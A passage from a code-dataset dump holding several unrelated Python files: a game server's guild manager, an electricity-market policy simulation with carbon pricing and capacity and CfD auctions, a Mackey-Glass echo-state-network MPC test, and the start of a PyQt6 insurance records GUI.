self.mgr.d_guildRejectInvite(self.sender, RejectCode.ALREADY_IN_GUILD)\n self.demand('Off')\n return\n \n self.air.dbInterface.queryObject(self.air.dbId, self.target, self.__retrievedPirate)\n \n def __retrievedPirate(self, 
dclass, fields):\n if dclass != self.air.dclassesByName['DistributedPlayerPirateUD']:\n self.demand('Error', 'Target is not a pirate.')\n return\n\n if fields.get('setGuildId', [0])[0]:\n self.mgr.d_guildRejectInvite(self.sender, RejectCode.ALREADY_IN_GUILD)\n self.demand('Off')\n return\n \n i, senderMember = self.getMember(self.sender)\n \n if not senderMember:\n self.demand('Off')\n return\n\n name = fields['setName'][0]\n member = [self.target, GUILDRANK_MEMBER, name, 0, 0]\n\n self.members.append(member)\n self.updateMembers(self.members)\n self.demand('UpdatePirate', self.target, self.guildId, self.guild['setName'][0], GUILDRANK_MEMBER)\n self.mgr.d_recvMemberAdded(self.mgr.getMemberIds(self.guildId), self.convertMember(member), self.sender, senderMember[2])\n\nclass SendChatOperation(RetrievePirateOperation):\n DELAY = 0.5\n\n def __init__(self, mgr, sender, callback, extraArgs):\n RetrievePirateOperation.__init__(self, mgr, sender)\n self.callback = callback\n self.extraArgs = extraArgs\n \n def enterRetrievedPirate(self):\n guildId = self.pirate.get('setGuildId', [0])[0]\n \n if not guildId:\n self.demand('Off')\n return\n\n memberList = self.mgr.getMemberIds(guildId)\n \n if not memberList:\n self.demand('Off')\n return\n \n self.extraArgs.insert(1, self.pirate['setName'][0])\n self.callback(memberList, *self.extraArgs)\n self.demand('Off')\n\nclass ChangeRankOperation(RetrievePirateGuildOperation):\n\n def __init__(self, mgr, sender, target, rank):\n RetrievePirateGuildOperation.__init__(self, mgr, sender, target)\n self.rank = rank\n\n def enterRetrievedGuild(self):\n guildName = self.guild['setName'][0]\n memberList = self.mgr.getMemberIds(self.guildId)\n i, senderMember = self.getMember(self.sender)\n \n if not senderMember:\n self.demand('Off')\n return\n \n senderRank = senderMember[1]\n \n if senderRank != GUILDRANK_GM:\n self.demand('Off')\n return\n\n j, targetMember = self.getMember(self.target)\n \n if not targetMember:\n self.demand('Off')\n return\n \n targetRank = targetMember[1]\n \n if self.rank == targetRank:\n self.demand('Off')\n return\n\n senderName = senderMember[2]\n avatarName = targetMember[2]\n \n if self.rank == GUILDRANK_GM:\n promote = True\n elif self.rank == GUILDRANK_VETERAN and targetRank == GUILDRANK_MEMBER:\n promote = True\n elif self.rank == GUILDRANK_OFFICER and targetRank in (GUILDRANK_MEMBER, GUILDRANK_VETERAN):\n promote = True\n else:\n promote = False\n\n self.members[j][1] = self.rank\n self.mgr.d_guildStatusUpdate(self.target, self.guildId, guildName, self.rank)\n self.mgr.d_recvMemberUpdateRank(memberList, self.target, self.sender, avatarName, senderName, self.rank, promote)\n \n if self.rank == GUILDRANK_GM:\n self.members[i][1] = GUILDRANK_OFFICER\n self.mgr.d_guildStatusUpdate(self.sender, self.guildId, guildName, GUILDRANK_OFFICER)\n self.mgr.d_recvMemberUpdateRank(memberList, self.sender, self.target, senderName, avatarName, GUILDRANK_OFFICER, False)\n \n self.updateMembers(self.members)\n self.demand('Off')\n\nclass SendNameOperation(RetrievePirateGuildOperation):\n\n def __init__(self, mgr, sender, name):\n RetrievePirateGuildOperation.__init__(self, mgr, sender)\n self.name = name\n \n def enterRetrievedGuild(self):\n i, member = self.getMember(self.sender)\n \n if (not member) or member[1] != GUILDRANK_GM:\n self.mgr.d_recvNameRequest([self.sender], 0)\n self.demand('Off')\n return\n \n if self.guild['setWishName'][0]:\n self.mgr.d_recvNameRequest([self.sender], 1)\n self.demand('Off')\n return\n \n 
self.mgr.air.csm.accountDB.getGuildNameStatus(self.name, self.__gotGuildNameStatus, 'New')\n \n def __gotGuildNameStatus(self, status):\n if status == 3:\n self.mgr.d_recvNameRequest([self.sender], 2)\n self.demand('Off')\n return\n \n self.air.dbInterface.updateObject(self.air.dbId, self.guildId, self.air.dclassesByName['DistributedGuildUD'], {'setWishName': [self.name], 'setOldName': [self.guild['setName'][0]]})\n self.mgr.d_recvNameRequest([self.sender], 3)\n self.demand('Off')\n \nclass GuildManagerUD(DistributedObjectGlobalUD):\n notify = DirectNotifyGlobal.directNotify.newCategory(\"GuildManagerUD\")\n \n def __init__(self, air):\n DistributedObjectGlobalUD.__init__(self, air)\n self.operations = {}\n self.invites = {}\n self.memberListCache = {}\n self.accept('pirateOnline', self.pirateOnline)\n self.accept('goingOffline', self.goingOffline)\n \n def addMemberList(self, guildId, memberList):\n self.memberListCache[guildId] = memberList\n \n def getMemberList(self, guildId):\n return self.memberListCache.get(guildId)\n \n def getMemberIds(self, guildId):\n memberList = self.getMemberList(guildId)\n \n if memberList:\n return [member[0] for member in memberList if member[0] in self.air.piratesFriendsManager.onlinePirates]\n \n def hasOperation(self, avId):\n return avId in self.operations\n\n def createGuild(self):\n avId = self.air.getAvatarIdFromSender()\n\n if avId not in self.operations:\n CreateGuildOperation(self, avId).demand('Start')\n \n def d_guildStatusUpdate(self, avId, guildId, guildName, guildRank):\n self.sendUpdateToAvatarId(avId, 'guildStatusUpdate', [guildId, guildName, guildRank])\n \n def d_notifyGuildKicksMaxed(self, avId):\n self.sendUpdateToAvatarId(avId, 'notifyGuildKicksMaxed', [])\n \n def d_receiveMembers(self, avId, members):\n self.sendUpdateToAvatarId(avId, 'receiveMembers', [members])\n \n def d_guildRejectInvite(self, avId, reason):\n self.sendUpdateToAvatarId(avId, 'guildRejectInvite', [reason])\n \n def d_invitationFrom(self, avId, fromId, fromName, guildId, guildName):\n self.sendUpdateToAvatarId(avId, 'invitationFrom', [fromId, fromName, guildId, guildName])\n \n def d_recvNameRequest(self, avIds, code):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvNameRequest', [code])\n \n def d_recvChat(self, avIds, senderId, senderName, message):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvChat', [senderId, senderName, message])\n \n def d_recvSC(self, avIds, senderId, senderName, msgIndex):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvSC', [senderId, senderName, msgIndex])\n \n def d_recvSCQuest(self, avIds, senderId, senderName, questInt, msgType, taskNum):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvSCQuest', [senderId, senderName, questInt, msgType, taskNum])\n \n def d_recvAvatarOnline(self, avIds, senderId, senderName):\n for avId in avIds:\n if avId != senderId:\n self.sendUpdateToAvatarId(avId, 'recvAvatarOnline', [senderId, senderName])\n \n def d_recvAvatarOffline(self, avIds, senderId, senderName):\n for avId in avIds:\n if avId != senderId:\n self.sendUpdateToAvatarId(avId, 'recvAvatarOffline', [senderId, senderName])\n \n def d_recvMemberRemoved(self, avIds, avatarId, senderId, avatarName, senderName):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvMemberRemoved', [avatarId, senderId, avatarName, senderName])\n \n def d_recvMemberAdded(self, avIds, memberInfo, inviterId, inviterName):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvMemberAdded', [memberInfo, 
inviterId, inviterName])\n \n def d_recvMemberUpdateRank(self, avIds, avatarId, senderId, avatarName, senderName, rank, promote):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'recvMemberUpdateRank', [avatarId, senderId, avatarName, senderName, rank, promote])\n\n def d_guildNameChange(self, avIds, guildName, code):\n for avId in avIds:\n self.sendUpdateToAvatarId(avId, 'guildNameChange', [guildName, code])\n \n def pirateOnline(self, doId):\n PirateOnlineOperation(self, doId).demand('Start')\n \n def goingOffline(self, doId):\n self.popInvite(doId)\n PirateOfflineOperation(self, doId).demand('Start')\n \n def removeMember(self, targetId):\n avId = self.air.getAvatarIdFromSender()\n \n if targetId and avId not in self.operations:\n RemoveMemberOperation(self, avId, targetId).demand('Start')\n \n def changeRank(self, targetId, targetRank):\n if targetRank not in (GUILDRANK_GM, GUILDRANK_MEMBER, GUILDRANK_OFFICER, GUILDRANK_VETERAN):\n return\n \n avId = self.air.getAvatarIdFromSender()\n \n if targetId == avId:\n return\n \n if targetId and avId not in self.operations:\n ChangeRankOperation(self, avId, targetId, targetRank).demand('Start')\n \n def popInvite(self, avId):\n return self.invites.pop(avId, None)\n \n def requestMembers(self):\n avId = self.air.getAvatarIdFromSender()\n\n if avId not in self.operations:\n MemberListOperation(self, avId).demand('Start')\n \n def isInInvite(self, avId):\n return avId in self.invites.keys() or avId in self.invites.values()\n \n def requestInvite(self, targetId):\n avId = self.air.getAvatarIdFromSender()\n \n if targetId == avId or self.isInInvite(targetId):\n self.d_guildRejectInvite(avId, RejectCode.BUSY)\n return\n \n if targetId not in self.air.piratesFriendsManager.onlinePirates:\n self.d_guildRejectInvite(avId, RejectCode.INVITEE_NOT_ONLINE)\n return\n \n if avId not in self.operations:\n RequestInviteOperation(self, avId, targetId).demand('Start')\n \n def acceptInvite(self):\n avId = self.air.getAvatarIdFromSender()\n senderId = self.popInvite(avId)\n \n if not senderId:\n return\n \n if avId not in self.operations:\n AddMemberOperation(self, senderId, avId).demand('Start')\n \n def declineInvite(self):\n avId = self.air.getAvatarIdFromSender()\n senderId = self.popInvite(avId)\n \n if senderId:\n self.d_guildRejectInvite(senderId, RejectCode.NO_GUILD)\n\n def sendNameRequest(self, name):\n if not name:\n return\n\n avId = self.air.getAvatarIdFromSender()\n \n if avId not in self.operations:\n SendNameOperation(self, avId, name).demand('Start')\n\n def addInvitation(self, sender, target, pirateName, guildId, guildName):\n self.invites[target] = sender\n self.d_invitationFrom(target, sender, pirateName, guildId, guildName)\n \n def __addChatOperation(self, callback, extraArgs):\n sender = self.air.getAvatarIdFromSender()\n \n if sender not in self.operations:\n extraArgs.insert(0, sender)\n SendChatOperation(self, sender, callback, extraArgs).demand('Start')\n \n def sendChat(self, message):\n self.__addChatOperation(self.d_recvChat, [message])\n \n def sendSC(self, msgIndex):\n self.__addChatOperation(self.d_recvSC, [msgIndex])\n \n def sendSCQuest(self, questInt, msgType, taskNum):\n self.__addChatOperation(self.d_recvSCQuest, [questInt, msgType, taskNum])","repo_name":"DarthMDev/PORSRC","sub_path":"otp/friends/GuildManagerUD.py","file_name":"GuildManagerUD.py","file_ext":"py","file_size_in_byte":24750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} 
+{"seq_id":"16110924083","text":"import random\nfrom random import randint\n\nfrom collections import namedtuple\nimport numpy as np\nimport pandas as pd\nimport math\nimport Utils\nimport os\n\n\nclass policyMaker():\n \n def __init__(self, params, BASEYEAR):\n self.params = params\n self.BASEYEAR = BASEYEAR\n self.year= self.BASEYEAR\n self.path_save = params[\"path_save\"]\n\n self.buildRatePerType = pd.DataFrame() #dataframe of the build rate per technology type per year\n\n carbonFilePath = 'CarbonPrice/carbonPrice'+str(self.BASEYEAR)+'_2050.txt'\n self.yearlyCarbonCost = Utils.loadTextFile(carbonFilePath)\n wholesaleElecFilePath = 'WholesaleEnergyPrices/ElectricityBaseLoad'+str(self.BASEYEAR)+'_2050_GBPPerkWh.txt'\n self.yearlyWholesalePrice = Utils.loadTextFile(wholesaleElecFilePath)\n self.curCO2Price = self.yearlyCarbonCost[0] #£/tCO2\n self.yearCO2IntensityTarget = 0 #gCO2/kWh \n\n self.name = 'Government'\n self.updateCO2Target()\n\n self.elecGenCompanies = list()\n\n def updateCO2Target(self):\n # gCO2/kWh, 50-100 in https://www.current-news.co.uk/news/uk-powers-to-new-grid-carbon-intensity-low-of-just-32g-co2-kwh\n if self.year<2018:\n self.carbonIntensityTarget = 250\n elif self.year<=2035:\n CO2DecreaseFrac = (self.year - 2018)/(2035 - 2018)\n newCO2P = 250 * (1-CO2DecreaseFrac)\n self.carbonIntensityTarget = newCO2P\n else:\n self.carbonIntensityTarget = 0\n\n # update values for next year\n def increment_year(self):\n self.year = self.year + 1\n self.updateCO2Target()\n\n def getNextYearCO2Price(self, carbonIntensity):\n print('emissionsIntense from last year (gCO2/kWh)',carbonIntensity)\n print('yearCO2IntensityTarget (gCO2/kWh)',self.carbonIntensityTarget)\n BEISco2Price = self.yearlyCarbonCost[self.year-self.BASEYEAR]\n if carbonIntensity > self.carbonIntensityTarget:\n CO210PC = self.curCO2Price *1.1\n if CO210PC > BEISco2Price:\n self.curCO2Price = CO210PC\n else:\n self.curCO2Price = BEISco2Price\n else:\n curCO2 = self.curCO2Price\n if curCO2 > BEISco2Price:\n self.curCO2Price = curCO2\n else:\n self.curCO2Price = BEISco2Price\n \n return self.curCO2Price\n\n # estimate demand in a specific year\n def projectedPeakDemand(self, targetYear):\n \n FESYearlyPeak = Utils.loadTextFile('Generation/NationalGrid_FES_TwoDeg_PeakDemandChange.txt')\n y = targetYear-2010\n newPeakD = FESYearlyPeak[y]*1000000.0 #in kW\n return newPeakD\n \n # estimate capacity in a specific year\n def projectedCapacity(self, targetYear):\n totCap = 0.0\n for eGC in self.elecGenCompanies:\n totCap = totCap + eGC.getCapYear(targetYear,True) # true for derated capacity\n return totCap\n\n # Method to cap the build rate of technologies\n # if capacity excess the build rate, bids are randomly removed\n def capBuildRate(self, bids, bidColumn, ascending=True):\n frames = []\n for genName in bids.index.unique():\n\n temp_df = bids.loc[genName, :].copy()\n if not isinstance(temp_df, pd.DataFrame): #there is only one line so it is a Serie\n temp_df = temp_df.to_frame().T\n else:\n temp_df = temp_df.sample(frac=1) # shuffle the dataset\n temp_df.sort_values(bidColumn, ascending=ascending, inplace=True) \n yearOfInstallation = temp_df[\"start_year\"].mean()\n maxBuildingRate = int(self.buildRatePerType.loc[genName,yearOfInstallation])\n print(\"The build rate of {0} is {1} kW in {2}\".format(genName, maxBuildingRate, yearOfInstallation))\n if maxBuildingRate>0:\n temp_df[\"cumulative_capacity_kW\"] = temp_df[\"capacity_kW\"].cumsum()\n temp_df = 
temp_df.loc[temp_df[\"cumulative_capacity_kW\"]<=maxBuildingRate, :]\n capToBeInstalled = temp_df[\"capacity_kW\"].sum()\n self.buildRatePerType.loc[genName,yearOfInstallation] = maxBuildingRate - capToBeInstalled\n frames.append(temp_df)\n if len(frames) > 0:\n newBids = pd.concat(frames)\n else:\n newBids = pd.DataFrame()\n return newBids\n\n # hold capacity auction\n def capacityAuction(self, timeHorizon, sorted_TNUoS_charges):\n print('---------------------- Capacity Auction Method ---------------------')\n demandYear = self.year+timeHorizon\n cap_subsidy = 0 #£/kW include cap of 75£/kW as per BRAIN paper for the bids\n scaleACS = 1.09 # The value of ACS accounts for a potential 9% increase in peak demand that could be experienced during a cold winter\n # Book: Ter-Gazarian, A.G., Energy Storage for Power Systems, Page 18\n estPeakD = (self.projectedPeakDemand(demandYear)* scaleACS)\n estDeRCap = self.projectedCapacity(demandYear)\n print(demandYear)\n print('Estimated Peak Demand ', estPeakD)\n print('Estimated Derated Capacity ', estDeRCap)\n \n if estPeakD > estDeRCap:\n print('---------------------- Holding Capacity Auction ---------------------')\n capShortFall = estPeakD - estDeRCap\n\n framesBids =[]\n for eGC in self.elecGenCompanies:\n temp_dfBids = eGC.getCapAuctionBid(timeHorizon, sorted_TNUoS_charges)\n framesBids.append(temp_dfBids)\n allBids = pd.concat(framesBids)\n allBids.to_csv(self.path_save+\"All_CapacityMarket_bids_\"+str(self.year)+\".csv\")\n #removed based that do not comply with the building rate of plants\n allBids = self.capBuildRate(allBids, \"bid_price_GBP/kW\")\n if len(allBids) > 0:\n allBids.sort_values([\"bid_price_GBP/kW\"], ascending=True, inplace=True)\n allBids[\"cumulative_derated_capacity_kW\"] = allBids[\"derated_capacity_kW\"].cumsum()\n \n # Allocate cap subsidies until demand is met\n if cap_subsidy > 0:\n allBids.loc[allBids[\"bid_price_GBP/kW\"] > cap_subsidy, \"bid_price_GBP/kW\"] = cap_subsidy\n unsuccessfulBids = allBids.loc[allBids[\"cumulative_derated_capacity_kW\"] > capShortFall, :].index\n successfulBids = allBids.loc[~allBids.index.isin(unsuccessfulBids), :]\n\n if len(successfulBids) > 0: #there are successful bids\n successfulBids.to_csv(self.path_save+\"Successful_CapacityMarket_Bids\"+str(self.year)+\".csv\")\n for genName, row in successfulBids.iterrows(): # Add eligible plants to the construction queue\n eGCName = row[\"generation_company\"]\n capacitykW = row[\"capacity_kW\"]\n start_year = row[\"start_year\"]\n end_year = row[\"end_year\"]\n capacity_market_sub = row[\"bid_price_GBP/kW\"]\n CfD_price = 0\n busbar = row[\"busbar\"]\n eGC = Utils.getGenerationCompany(eGCName, self.elecGenCompanies)\n eGC.addToConstructionQueue(genName, capacitykW, start_year, end_year, capacity_market_sub, CfD_price, busbar)\n else:\n print(' ----------------- No capacity auction ----------------------')\n return estPeakD, estDeRCap\n\n\n # method to hold CfD auction\n def cfdAuction(self, capYears, commisCap, timeHorizon, sorted_TNUoS_charges, avgElectricityPrice):\n # check if commissioning year\n y = self.year - self.BASEYEAR\n allBids = pd.DataFrame()\n if y%capYears == 0: #capYears =3\n print('++++++++++++++++++ Holding CfD auction +++++++++++++++++++++++')\n print(\"year\", y)\n frames = []\n for eGC in self.elecGenCompanies:\n # print(eGC.name)\n temp_bids_df = eGC.getCFDAuctionBid(timeHorizon, sorted_TNUoS_charges)\n frames.append(temp_bids_df) \n if len(frames)>0:\n # Merge the bids together and select the accepted bids\n allBids = 
pd.concat(frames)\n allBids = allBids.loc[allBids[\"capacity_kW\"]>0].copy()\n allBids = self.capBuildRate(allBids, 'strike_price_GBP/kWh')\n\n allBids.sort_values(by=['strike_price_GBP/kWh'], inplace=True)\n allBids.to_csv(self.path_save+\"All_CfD_bids_\"+str(self.year)+\".csv\")\n print(\"Average electricity price {0}\".format(avgElectricityPrice))\n allBids = allBids.loc[allBids['strike_price_GBP/kWh']>avgElectricityPrice, :]\n allBids[\"cumulative_capacity_kW\"] = allBids[\"capacity_kW\"].cumsum()\n successfulBids = allBids.loc[allBids[\"cumulative_capacity_kW\"]<=commisCap, :] #accepted bids\n\n if len(successfulBids) > 0:\n successfulBids.to_csv(self.path_save+\"Successful_CfD_bids_\"+str(self.year)+\".csv\")\n\n for genName, row in successfulBids.iterrows(): # Add eligible plant to the construction queue\n eGCName = row[\"generation_company\"]\n capacitykW = row[\"capacity_kW\"]\n start_year = row[\"start_year\"]\n end_year = row[\"end_year\"]\n CfD_price = -(avgElectricityPrice-row['strike_price_GBP/kWh'])\n capacity_market_sub = 0\n busbar = row[\"busbar\"]\n eGC = Utils.getGenerationCompany(eGCName, self.elecGenCompanies)\n eGC.addToConstructionQueue(genName, capacitykW, start_year, end_year, capacity_market_sub, CfD_price, busbar)\n else:\n print('++++++++++++++++++ No CfD auction +++++++++++++++++++++++')\n\n return True\n\n\n\n\n \n\n\n\nif __name__ == '__main__': # to test some of the functions of the policy Maker\n path_technology_dataset = r'D:\\OneDrive - Cardiff University\\04 - Projects\\18 - ABM\\01 - Code\\ABM code - Dec 2021\\Code_WH'\n # list of generation technologies\n technoloy_dataset_fn = \"technology_technical_economic_parameters.xlsx\"\n temp_df = pd.read_excel(path_technology_dataset+os.path.sep+technoloy_dataset_fn, sheet_name = \"technical_parameters\", index_col=0)\n technology_technical_df = temp_df.loc[temp_df[\"Set\"]==\"Current\", :].copy()\n\n temp_df = pd.read_excel(path_technology_dataset+os.path.sep+technoloy_dataset_fn, sheet_name = \"economic_parameters\")\n technology_economic_df = temp_df.loc[temp_df[\"Set\"]==\"Current\", :].copy()\n technology_economic_df.fillna(0, inplace=True)\n\n busbarConstraints = pd.read_excel(path_technology_dataset+os.path.sep+technoloy_dataset_fn, sheet_name = \"Bus constraints\", index_col=0)\n busbarConstraints.fillna(0, inplace=True)\n\n params = {}\n params[\"technical_parameters\"] = technology_technical_df\n params[\"economic_parameters\"] = technology_economic_df\n params[\"busbar_constraints\"] = busbarConstraints\n genTechList = list(technology_technical_df.index)\n\n buildRatePerType = pd.DataFrame(index= genTechList+['Battery'],columns=[2010+y for y in range(70)])\n buildRatePerType.fillna(2000000, inplace=True)\n\n # path to where you want results output to\n \n params[\"path_save\"] = 'Results/2050/'\n params[\"path_wholesale_fuel_price\"] = r'D:\\OneDrive - Cardiff University\\04 - Projects\\18 - ABM\\01 - Code\\ABM code - Jan 2022 saved\\Code_WH\\WholesaleEnergyPrices'\n\n bids_test = pd.DataFrame(Utils.getBids1())\n bids_test.set_index('Unnamed: 0', inplace=True, drop=True)\n\n other_bids = pd.DataFrame(Utils.getBids2())\n other_bids.set_index('Unnamed: 0', inplace=True, drop=True) \n\n buildRatedf = pd.DataFrame(Utils.getBuildRate())\n buildRatedf.set_index('Unnamed: 0', inplace=True, drop=True) \n\n policy = policyMaker(params, 2010)\n policy.buildRatePerType = buildRatePerType\n policy.year = 2036\n\n new_bids = policy.capBuildRate(bids_test, 'Bid_Price_GBP/kW')\n 
print(policy.buildRatePerType.loc[:, 2036:2045])\n print(len(new_bids))\n\n new_bids = policy.capBuildRate(other_bids, 'ROI', False)\n print(policy.buildRatePerType.loc[:, 2036:2045])\n print(len(new_bids))\n print(new_bids)\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n \n \n","repo_name":"AlexandreLab/ABM","sub_path":"policyMaker.py","file_name":"policyMaker.py","file_ext":"py","file_size_in_byte":12468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23578603572","text":"# -------------------------------------------------------------------------------------------------------------------- #\n# Add path and create output folder\n\nfrom os import sep, makedirs, path\nfrom sys import path as syspath\n\n# Add path\nfileName = path.abspath(__file__)\npathMain = fileName[:fileName.lower().find(sep + 'quasimodo') + 10]\nsyspath.append(pathMain)\n\n# Create output folder\npathOut = path.join(pathMain, 'tests', 'results', fileName[fileName.rfind(sep) + 1:-3])\nmakedirs(pathOut, exist_ok=True)\n# -------------------------------------------------------------------------------------------------------------------- #\n\nfrom QuaSiModO import *\nfrom visualization import *\nimport numpy as np\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# Set parameters\n# -------------------------------------------------------------------------------------------------------------------- #\nT = 20.0 # Time for the MPC problem\nh = 0.05 # Time step for the ODE solver, for the training data sampling and for the MPC step length\n\nuMin = [-0.2] # Minimal value of the input (also defines dimU)\nuMax = [1.0]\n\nnGridU = 2 # number of parts the grid is split into (--> uGrid = [-2, 0, 2])\nuGrid = np.array([uMin, [0.0], uMax])\n\nTtrain = 20.0 # Time for the simulation in the traing data generation\nnLag = 5 # Lag time for EDMD\n\ntau = 2.0\ndimZ = 1\n\ny0 = list()\nnSpline = 4\ntSpline = np.linspace(-tau, 0.0, nSpline)\ntTau = np.linspace(-tau, 0.0, int(tau / h) + 1)\ntck = interpolate.splrep(tSpline, 0.5 + 2.0 * np.random.rand(nSpline), s=0)\ny0.append(interpolate.splev(tTau, tck, der=0))\nparams = {'tau': tau}\n\napprox_res_size = 200\nradius = 0.75\nsparsity = 0.9\n\npathData = path.join(pathOut, 'data_ESN_1_0')\nsavePath_mat = path.join(pathOut, 'result_ESN_1_0')\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# Model creation\n# -------------------------------------------------------------------------------------------------------------------- #\n\n# Create model class\nmodel = ClassModel('mackey-glass.py', h=h, uMin=uMin, uMax=uMax, dimZ=dimZ, params=params, typeUGrid='cube',\n nGridU=nGridU, uGrid=uGrid)\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# Data collection\n# -------------------------------------------------------------------------------------------------------------------- #\n\n# Create data set class\ndataSet = ClassControlDataSet(h=model.h, T=Ttrain)\n\nuTrain, iuTrain = dataSet.createControlSequence(model, T=1000.0, typeSequence='piecewiseConstant', nhMin=5,\n nhMax=5) # , u=uTrain,iu=iuTrain)#,u=uTrain,iu=iuTrain)\n\n# Create a data set (and save it to an npz file)\nif path.exists(pathData + '.npz'):\n dataSet.createData(loadPath=pathData)\nelse:\n dataSet.createData(model=model, y0=y0, u=uTrain, 
savePath=pathData)\n\ny0 = dataSet.rawData.y[-1][-nLag, :]\nz0 = dataSet.rawData.z[-1][-nLag, :]\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# Surrogate modeling\n# -------------------------------------------------------------------------------------------------------------------- #\n\n
surrogate = ClassSurrogateModel('ESN.py', uGrid=model.uGrid, h=nLag * model.h, dimZ=model.dimZ,\n                                z0=z0, nDelay=0, nLag=nLag,\n                                approx_res_size=approx_res_size, spectral_radius=radius, sparsity=sparsity)\n\n
# For the ESN we need the rawData (not prepared)\n# ToDo: write a suitable prepareData routine for this\nsurrogate.createROM(dataSet.rawData)\n\n
# -------------------------------------------------------------------------------------------------------------------- #\n# MPC\n# -------------------------------------------------------------------------------------------------------------------- #\n\n
# Define reference trajectory for second state variable (iRef = 1)\nTRef = T + 5.0\nnRef = int(round(TRef / h)) + 1\n\nzRef = np.zeros([nRef, 1], dtype=float)\nzRef[:, 0] = 1.0\n\ntRef = np.array(np.linspace(0.0, T, nRef))\n\nreference = ClassReferenceTrajectory(model, T=TRef, zRef=zRef)\n\nscipyMinimizeOptions = {'epsilon': 1e-10}\n\n
# Create class for the MPC problem\nMPC = ClassMPC(np=5, nc=1, typeOpt='continuous', scipyMinimizeMethod='SLSQP',\n               scipyMinimizeOptions=scipyMinimizeOptions)  # scipyMinimizeMethod=\n\n
# Weights for the objective function\nQ = [1.0]  # reference tracking: (z - deltaZ)^T * Q * (z - deltaZ)\nR = [0.0]  # control cost: u^T * R * u\nS = [0.0]  # weighting of (u_k - u_{k-1})^T * S * (u_k - u_{k-1})\n\n
# -------------------------------------------------------------------------------------------------------------------- #\n# Solve different MPC problems (via \"MPC.run\") and plot the result\n# -------------------------------------------------------------------------------------------------------------------- #\n\n
save_path_cont = path.join(pathOut, 'MackeyGlass_ESN_cont_1_0')\nsave_path_SUR = path.join(pathOut, 'MackeyGlass_ESN_SUR_1_0')\n\n
# 1) Surrogate model, continuous input obtained via relaxation of the integer input in uGrid\nresultCont = MPC.run(model, reference, surrogateModel=surrogate, y0=y0, z0=z0, T=T, Q=Q, R=R, S=S,\n                     savePath=save_path_cont)\nresultCont.saveMat('MackeyGlass_ESN_cont_1_0', pathOut)\n\n
plot(z={'t': resultCont.t, 'z': resultCont.z, 'reference': reference, 'iplot': 0},\n     u={'t': resultCont.t, 'u': resultCont.u, 'iplot': 1},\n     J={'t': resultCont.t, 'J': resultCont.J, 'iplot': 2},\n     nFev={'t': resultCont.t, 'nFev': resultCont.nFev, 'iplot': 3})\n\n
# Not relevant since the control enters linearly\n# 2) Surrogate model, integer control computed via relaxation and sum-up rounding\n# MPC.typeOpt = 'SUR'\n# result_SUR = MPC.run(model, reference, surrogateModel=surrogate, y0=y0, z0=z0, T=T, Q=Q, R=R, S=S, savePath=save_path_SUR)\n# result_SUR.saveMat('MackeyGlass_ESN_SUR_1_0', pathOut)\n#\n
# plot(z={'t': result_SUR.t, 'z': result_SUR.z, 'reference': reference, 'iplot': 0},\n#      u={'t': result_SUR.t, 'u': result_SUR.u, 'iplot': 1},\n#      J={'t': result_SUR.t, 'J': result_SUR.J, 'iplot': 2},\n#      nFev={'t': result_SUR.t, 'nFev': result_SUR.nFev, 'iplot': 3},\n#      alpha={'t': result_SUR.t, 'alpha': result_SUR.alpha, 'iplot': 4},\n#      omega={'t': result_SUR.t, 'omega': result_SUR.omega, 'iplot': 
5})\n","repo_name":"SebastianPeitz/QuaSiModO","sub_path":"tests/MackeyGlass_ESN.py","file_name":"MackeyGlass_ESN.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"} +{"seq_id":"74747098605","text":"import sys\nfrom PyQt6.QtWidgets import QApplication, QLabel, QWidget, QGridLayout, \\\n QLineEdit, QPushButton, QMainWindow, QTableWidget, QTableWidgetItem, \\\n QDialog, \\\n QVBoxLayout, QComboBox, QToolBar, QStatusBar, QMessageBox\nfrom PyQt6.QtGui import QAction, QIcon\nfrom PyQt6.QtCore import Qt\n\nfrom DatabaseConnection import DatabaseConnection\nfrom AboutDialog import AboutDialog\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n\n super().__init__()\n self.setWindowTitle(\"Insurance Management System\")\n self.setMinimumSize(800, 600)\n\n file_menu_item = self.menuBar().addMenu(\"&File\")\n help_menu_item = self.menuBar().addMenu(\"&Help\")\n edit_menu_item = self.menuBar().addMenu(\"&Edit\")\n\n add_insurance_action = QAction(QIcon(\"icons/add.png\"),\n \"Add Record\", self)\n add_insurance_action.triggered.connect(self.insert)\n file_menu_item.addAction(add_insurance_action)\n\n search_action = QAction(QIcon(\"icons/search.png\"),\n \"Search\", self)\n search_action.triggered.connect(self.search)\n edit_menu_item.addAction(search_action)\n\n about_action = QAction(\"About\", self)\n help_menu_item.addAction(about_action)\n about_action.triggered.connect(self.about)\n\n self.table = QTableWidget()\n self.table.setColumnCount(5)\n self.table.setHorizontalHeaderLabels((\"Id\", \"Name\", \"Insurance\",\n \"Mobile\", \"Age\"))\n self.table.verticalHeader().setVisible(False)\n self.setCentralWidget(self.table)\n\n # Create toolbar and add toolbar elements\n toolbar = QToolBar()\n toolbar.setMovable(True)\n self.addToolBar(toolbar)\n toolbar.addAction(add_insurance_action)\n toolbar.addAction(search_action)\n\n # Create a status bar and add status bar elements\n self.statusbar = QStatusBar()\n self.setStatusBar(self.statusbar)\n\n # Detect a cell click\n self.table.cellClicked.connect(self.cell_clicked)\n\n def cell_clicked(self):\n \"\"\"\n This function creates the status bar actions\n :return:\n \"\"\"\n edit_button = QPushButton(\"Edit Record\")\n edit_button.clicked.connect(self.edit)\n\n delete_button = QPushButton(\"Delete Record\")\n delete_button.clicked.connect(self.delete)\n\n children = self.findChildren(QPushButton)\n if children:\n for child in children:\n self.statusbar.removeWidget(child)\n\n self.statusbar.addWidget(edit_button)\n self.statusbar.addWidget(delete_button)\n\n def load_data(self):\n \"\"\"\n This function loads the data in the database\n 